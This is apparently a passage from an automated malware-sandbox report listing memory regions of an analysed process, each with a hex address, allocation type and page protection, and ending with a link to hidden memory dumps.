direct allocation
|
page execute and read and write
|
||
B8B9000
|
direct allocation
|
page execute and read and write
|
||
230E0000
|
trusted library allocation
|
page read and write
|
||
B421000
|
direct allocation
|
page execute and read and write
|
||
AFA5000
|
direct allocation
|
page execute and read and write
|
||
B117000
|
direct allocation
|
page execute and read and write
|
||
B932000
|
direct allocation
|
page execute and read and write
|
||
BCF6000
|
direct allocation
|
page execute and read and write
|
||
ABC7000
|
direct allocation
|
page execute and read and write
|
||
ACEB000
|
direct allocation
|
page execute and read and write
|
||
B038000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
BFA0000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
21FB1000
|
trusted library allocation
|
page read and write
|
||
B1D3000
|
direct allocation
|
page execute and read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
B671000
|
direct allocation
|
page execute and read and write
|
||
23FB0000
|
trusted library allocation
|
page read and write
|
||
21E54000
|
trusted library allocation
|
page read and write
|
||
ADA2000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
24C70000
|
trusted library allocation
|
page read and write
|
||
BB2C000
|
direct allocation
|
page execute and read and write
|
||
B85D000
|
direct allocation
|
page execute and read and write
|
||
24D30000
|
trusted library allocation
|
page read and write
|
||
24D95000
|
trusted library allocation
|
page read and write
|
||
BE61000
|
direct allocation
|
page execute and read and write
|
||
22C00000
|
trusted library allocation
|
page read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
AD82000
|
direct allocation
|
page execute and read and write
|
||
B585000
|
direct allocation
|
page execute and read and write
|
||
A938000
|
direct allocation
|
page execute and read and write
|
||
B297000
|
direct allocation
|
page execute and read and write
|
||
B977000
|
direct allocation
|
page execute and read and write
|
||
B758000
|
direct allocation
|
page execute and read and write
|
||
BB29000
|
direct allocation
|
page execute and read and write
|
||
ADC5000
|
direct allocation
|
page execute and read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
BBB4000
|
direct allocation
|
page execute and read and write
|
||
2297F000
|
trusted library allocation
|
page read and write
|
||
22969000
|
trusted library allocation
|
page read and write
|
||
B240000
|
direct allocation
|
page execute and read and write
|
||
B0E5000
|
direct allocation
|
page execute and read and write
|
||
B09C000
|
direct allocation
|
page execute and read and write
|
||
AEE1000
|
direct allocation
|
page execute and read and write
|
||
86B5000
|
trusted library allocation
|
page read and write
|
||
2E2E000
|
stack
|
page read and write
|
||
B4A6000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
2F80000
|
trusted library allocation
|
page read and write
|
||
AE9E000
|
direct allocation
|
page execute and read and write
|
||
B475000
|
direct allocation
|
page execute and read and write
|
||
B857000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
ACD0000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
A992000
|
direct allocation
|
page execute and read and write
|
||
BA4B000
|
direct allocation
|
page execute and read and write
|
||
AD89000
|
direct allocation
|
page execute and read and write
|
||
219CC000
|
stack
|
page read and write
|
||
AE4E000
|
direct allocation
|
page execute and read and write
|
||
AD2E000
|
direct allocation
|
page execute and read and write
|
||
B8A9000
|
direct allocation
|
page execute and read and write
|
||
86D0000
|
trusted library allocation
|
page read and write
|
||
70FF000
|
heap
|
page read and write
|
||
230F3000
|
trusted library allocation
|
page read and write
|
||
B38C000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
B5C5000
|
direct allocation
|
page execute and read and write
|
||
22987000
|
trusted library allocation
|
page read and write
|
||
24AA0000
|
trusted library allocation
|
page read and write
|
||
524000
|
heap
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
BE4F000
|
direct allocation
|
page execute and read and write
|
||
B60E000
|
direct allocation
|
page execute and read and write
|
||
AE38000
|
direct allocation
|
page execute and read and write
|
||
AE66000
|
direct allocation
|
page execute and read and write
|
||
BA2F000
|
direct allocation
|
page execute and read and write
|
||
7C90000
|
trusted library allocation
|
page read and write
|
||
703E000
|
stack
|
page read and write
|
||
240A6000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
AF95000
|
direct allocation
|
page execute and read and write
|
||
8BFE000
|
stack
|
page read and write
|
||
B3AA000
|
direct allocation
|
page execute and read and write
|
||
B38A000
|
direct allocation
|
page execute and read and write
|
||
B822000
|
direct allocation
|
page execute and read and write
|
||
B3D8000
|
direct allocation
|
page execute and read and write
|
||
B007000
|
direct allocation
|
page execute and read and write
|
||
BA7D000
|
direct allocation
|
page execute and read and write
|
||
C023000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
5028000
|
trusted library allocation
|
page read and write
|
||
78B0000
|
trusted library allocation
|
page read and write
|
||
B2CF000
|
direct allocation
|
page execute and read and write
|
||
B633000
|
direct allocation
|
page execute and read and write
|
||
ADEA000
|
direct allocation
|
page execute and read and write
|
||
70F7000
|
heap
|
page read and write
|
||
7580000
|
trusted library allocation
|
page read and write
|
||
3200000
|
heap
|
page read and write
|
||
BB94000
|
direct allocation
|
page execute and read and write
|
||
257A0000
|
trusted library allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
AE08000
|
direct allocation
|
page execute and read and write
|
||
22C8B000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
B29B000
|
direct allocation
|
page execute and read and write
|
||
8C00000
|
trusted library allocation
|
page read and write
|
||
A99F000
|
direct allocation
|
page execute and read and write
|
||
B948000
|
direct allocation
|
page execute and read and write
|
||
B1A0000
|
direct allocation
|
page execute and read and write
|
||
24DC0000
|
trusted library allocation
|
page read and write
|
||
77FE000
|
stack
|
page read and write
|
||
B29C000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
A5A7000
|
direct allocation
|
page execute and read and write
|
||
B42E000
|
direct allocation
|
page execute and read and write
|
||
B1B4000
|
direct allocation
|
page execute and read and write
|
||
B0D1000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
AF2F000
|
direct allocation
|
page execute and read and write
|
||
B551000
|
direct allocation
|
page execute and read and write
|
||
300B000
|
heap
|
page read and write
|
||
B43E000
|
direct allocation
|
page execute and read and write
|
||
8B7C000
|
stack
|
page read and write
|
||
BBDC000
|
direct allocation
|
page execute and read and write
|
||
24314000
|
heap
|
page read and write
|
||
560000
|
trusted library allocation
|
page read and write
|
||
BC4E000
|
direct allocation
|
page execute and read and write
|
||
9300000
|
heap
|
page read and write
|
||
BA95000
|
direct allocation
|
page execute and read and write
|
||
AFA3000
|
direct allocation
|
page execute and read and write
|
||
24BB1000
|
heap
|
page read and write
|
||
256E0000
|
trusted library allocation
|
page read and write
|
||
753A000
|
heap
|
page read and write
|
||
B08A000
|
direct allocation
|
page execute and read and write
|
||
22064000
|
trusted library allocation
|
page read and write
|
||
BC40000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
BC34000
|
direct allocation
|
page execute and read and write
|
||
BBA8000
|
direct allocation
|
page execute and read and write
|
||
AE52000
|
direct allocation
|
page execute and read and write
|
||
21D3E000
|
stack
|
page read and write
|
||
B644000
|
direct allocation
|
page execute and read and write
|
||
B9EF000
|
direct allocation
|
page execute and read and write
|
||
B820000
|
direct allocation
|
page execute and read and write
|
||
AF4E000
|
direct allocation
|
page execute and read and write
|
||
B0B4000
|
direct allocation
|
page execute and read and write
|
||
23F40000
|
trusted library allocation
|
page read and write
|
||
BB63000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B15A000
|
direct allocation
|
page execute and read and write
|
||
B6D7000
|
direct allocation
|
page execute and read and write
|
||
23F40000
|
trusted library allocation
|
page read and write
|
||
B1C3000
|
direct allocation
|
page execute and read and write
|
||
2309F000
|
trusted library allocation
|
page read and write
|
||
AC35000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
BA07000
|
direct allocation
|
page execute and read and write
|
||
B2B1000
|
direct allocation
|
page execute and read and write
|
||
B19D000
|
direct allocation
|
page execute and read and write
|
||
ADAE000
|
direct allocation
|
page execute and read and write
|
||
6510000
|
direct allocation
|
page read and write
|
||
4F02000
|
trusted library allocation
|
page read and write
|
||
BEB2000
|
direct allocation
|
page execute and read and write
|
||
24C15000
|
heap
|
page read and write
|
||
B06F000
|
direct allocation
|
page execute and read and write
|
||
B25F000
|
direct allocation
|
page execute and read and write
|
||
2204C000
|
trusted library allocation
|
page read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
B9B0000
|
direct allocation
|
page execute and read and write
|
||
B516000
|
direct allocation
|
page execute and read and write
|
||
BCAF000
|
direct allocation
|
page execute and read and write
|
||
BC23000
|
direct allocation
|
page execute and read and write
|
||
BBEE000
|
direct allocation
|
page execute and read and write
|
||
BD70000
|
direct allocation
|
page execute and read and write
|
||
B46A000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
A734000
|
direct allocation
|
page execute and read and write
|
||
B83A000
|
direct allocation
|
page execute and read and write
|
||
2289C000
|
stack
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
25780000
|
trusted library allocation
|
page read and write
|
||
AD9D000
|
direct allocation
|
page execute and read and write
|
||
70FD000
|
heap
|
page read and write
|
||
BBF0000
|
direct allocation
|
page execute and read and write
|
||
B1A2000
|
direct allocation
|
page execute and read and write
|
||
BA89000
|
direct allocation
|
page execute and read and write
|
||
BD52000
|
direct allocation
|
page execute and read and write
|
||
B8CF000
|
direct allocation
|
page execute and read and write
|
||
23F20000
|
trusted library allocation
|
page read and write
|
||
B142000
|
direct allocation
|
page execute and read and write
|
||
B773000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
B4D7000
|
direct allocation
|
page execute and read and write
|
||
227BE000
|
stack
|
page read and write
|
||
AF6E000
|
direct allocation
|
page execute and read and write
|
||
2391F000
|
trusted library allocation
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
A98E000
|
direct allocation
|
page execute and read and write
|
||
7860000
|
trusted library allocation
|
page read and write
|
||
7720000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
BFF6000
|
direct allocation
|
page execute and read and write
|
||
23043000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
25050000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
AF4D000
|
direct allocation
|
page execute and read and write
|
||
76DE000
|
stack
|
page read and write
|
||
B5E4000
|
direct allocation
|
page execute and read and write
|
||
23FA1000
|
trusted library allocation
|
page read and write
|
||
A1D0000
|
direct allocation
|
page execute and read and write
|
||
7C20000
|
trusted library allocation
|
page read and write
|
||
24A90000
|
trusted library allocation
|
page read and write
|
||
B68C000
|
direct allocation
|
page execute and read and write
|
||
70C0000
|
heap
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
839E000
|
stack
|
page read and write
|
||
B45D000
|
direct allocation
|
page execute and read and write
|
||
BE03000
|
direct allocation
|
page execute and read and write
|
||
24E2E000
|
stack
|
page read and write
|
||
21F7A000
|
trusted library allocation
|
page read and write
|
||
B94A000
|
direct allocation
|
page execute and read and write
|
||
25820000
|
trusted library allocation
|
page read and write
|
||
8B3E000
|
stack
|
page read and write
|
||
24D30000
|
trusted library allocation
|
page read and write
|
||
4D8E000
|
stack
|
page read and write
|
||
8BBE000
|
stack
|
page read and write
|
||
7900000
|
trusted library allocation
|
page read and write
|
||
6E47000
|
heap
|
page read and write
|
||
BD99000
|
direct allocation
|
page execute and read and write
|
||
23FB0000
|
trusted library allocation
|
page read and write
|
||
23FB0000
|
trusted library allocation
|
page read and write
|
||
B8AB000
|
direct allocation
|
page execute and read and write
|
||
23F30000
|
trusted library allocation
|
page read and write
|
||
B842000
|
direct allocation
|
page execute and read and write
|
||
B03D000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
65F1000
|
heap
|
page read and write
|
||
AB5A000
|
direct allocation
|
page execute and read and write
|
||
B76F000
|
direct allocation
|
page execute and read and write
|
||
23F30000
|
trusted library allocation
|
page read and write
|
||
22046000
|
trusted library allocation
|
page read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
3439000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
BADE000
|
direct allocation
|
page execute and read and write
|
||
2211D000
|
trusted library allocation
|
page read and write
|
||
A565000
|
direct allocation
|
page execute and read and write
|
||
AD43000
|
direct allocation
|
page execute and read and write
|
||
B9C5000
|
direct allocation
|
page execute and read and write
|
||
B5B3000
|
direct allocation
|
page execute and read and write
|
||
BBAB000
|
direct allocation
|
page execute and read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
256C0000
|
trusted library allocation
|
page read and write
|
||
25700000
|
trusted library allocation
|
page read and write
|
||
BCD8000
|
direct allocation
|
page execute and read and write
|
||
B82F000
|
direct allocation
|
page execute and read and write
|
||
B7DE000
|
direct allocation
|
page execute and read and write
|
||
BA1B000
|
direct allocation
|
page execute and read and write
|
||
241B1000
|
heap
|
page read and write
|
||
BC62000
|
direct allocation
|
page execute and read and write
|
||
409000
|
unkown
|
page read and write
|
||
AD64000
|
direct allocation
|
page execute and read and write
|
||
6629000
|
heap
|
page read and write
|
||
BA0F000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
AC49000
|
direct allocation
|
page execute and read and write
|
||
BC87000
|
direct allocation
|
page execute and read and write
|
||
BEBE000
|
direct allocation
|
page execute and read and write
|
||
B6A3000
|
direct allocation
|
page execute and read and write
|
||
23B45000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
B252000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
2730000
|
heap
|
page readonly
|
||
2316F000
|
trusted library allocation
|
page read and write
|
||
22C02000
|
trusted library allocation
|
page read and write
|
||
B457000
|
direct allocation
|
page execute and read and write
|
||
A6D4000
|
direct allocation
|
page execute and read and write
|
||
B881000
|
direct allocation
|
page execute and read and write
|
||
BD04000
|
direct allocation
|
page execute and read and write
|
||
7830000
|
heap
|
page execute and read and write
|
||
3452000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
6C80000
|
heap
|
page read and write
|
||
BE63000
|
direct allocation
|
page execute and read and write
|
||
25780000
|
trusted library allocation
|
page read and write
|
||
2309C000
|
trusted library allocation
|
page read and write
|
||
AEE6000
|
direct allocation
|
page execute and read and write
|
||
7000000
|
direct allocation
|
page read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
B682000
|
direct allocation
|
page execute and read and write
|
||
BDC4000
|
direct allocation
|
page execute and read and write
|
||
BFFD000
|
direct allocation
|
page execute and read and write
|
||
B8E0000
|
direct allocation
|
page execute and read and write
|
||
22BBC000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
6379000
|
trusted library allocation
|
page read and write
|
||
B553000
|
direct allocation
|
page execute and read and write
|
||
25700000
|
trusted library allocation
|
page read and write
|
||
AD1B000
|
direct allocation
|
page execute and read and write
|
||
AE3A000
|
direct allocation
|
page execute and read and write
|
||
2410000
|
heap
|
page read and write
|
||
BD57000
|
direct allocation
|
page execute and read and write
|
||
2194F000
|
stack
|
page read and write
|
||
BB01000
|
direct allocation
|
page execute and read and write
|
||
AF5E000
|
direct allocation
|
page execute and read and write
|
||
B62C000
|
direct allocation
|
page execute and read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
23CE5000
|
trusted library allocation
|
page read and write
|
||
25700000
|
trusted library allocation
|
page read and write
|
||
BC5E000
|
direct allocation
|
page execute and read and write
|
||
64F0000
|
direct allocation
|
page read and write
|
||
BD54000
|
direct allocation
|
page execute and read and write
|
||
B184000
|
direct allocation
|
page execute and read and write
|
||
6517000
|
trusted library allocation
|
page read and write
|
||
BF7A000
|
direct allocation
|
page execute and read and write
|
||
BE2A000
|
direct allocation
|
page execute and read and write
|
||
BE57000
|
direct allocation
|
page execute and read and write
|
There are 3541 hidden memdumps, click here to show them.